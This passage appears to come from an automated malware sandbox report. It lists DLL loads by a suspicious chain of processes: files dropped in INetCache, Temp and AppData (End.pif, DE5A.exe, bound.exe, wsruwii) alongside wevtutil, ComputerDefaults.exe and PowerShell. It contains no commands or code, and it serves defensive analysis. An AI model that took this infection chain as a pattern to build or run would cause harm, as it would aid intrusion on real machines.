                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: networkexplorer.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: thumbcache.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: policymanager.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: dataexchange.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: d3d11.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: dcomp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: dxgi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: windows.ui.fileexplorer.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: assignedaccessruntime.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: xmllite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: structuredquery.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: windows.storage.search.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: iconcodecservice.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: twinapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: actxprxy.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: networkexplorer.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\wsruwiiSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: python3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libffi-8.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: sqlite3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libcrypto-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libssl-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wevtutil.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wevtutil.exeSection loaded: wevtapi.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: ieframe.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: version.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: mlang.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: mrmcorer.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windows.staterepositorycore.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windows.ui.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: windowmanagementapi.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: inputhost.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\ComputerDefaults.exeSection loaded: bcp47mrm.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wevtutil.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wevtutil.exeSection loaded: wevtapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: python3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libffi-8.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: sqlite3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libcrypto-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: libssl-3.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ntmarta.dll
